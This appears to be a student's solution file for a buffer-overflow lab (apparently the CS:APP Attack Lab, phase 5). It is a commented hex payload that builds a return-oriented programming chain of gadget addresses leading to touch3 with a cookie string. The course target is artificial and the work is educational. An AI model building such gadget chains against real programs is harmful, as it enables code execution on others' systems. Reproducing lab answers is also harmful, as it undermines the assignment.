00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
ab 19 40 00 00 00 00 00  /* address with command popq %rax */
20 00 00 00 00 00 00 00  /* offset of the rsp below to string */
42 1a 40 00 00 00 00 00  /* address with command movl %eax, %edx */
34 1a 40 00 00 00 00 00  /* address with command movl %edx, %ecx */
13 1a 40 00 00 00 00 00  /* address with command movl %ecx, %esi */
06 1a 40 00 00 00 00 00  /* address with command movq %rsp, %rax */
a2 19 40 00 00 00 00 00  /* <-- rsp    also address with command movq %rax, %rdi */
d6 19 40 00 00 00 00 00  /* call add_xy */
a2 19 40 00 00 00 00 00  /* address with command movq %rax, %rdi */
fa 18 40 00 00 00 00 00  /* address of touch3 */
35 39 62 39 39 37 66 61  /* string of cookie "59b997fa" */
00 00 00 00 00 00 00 00
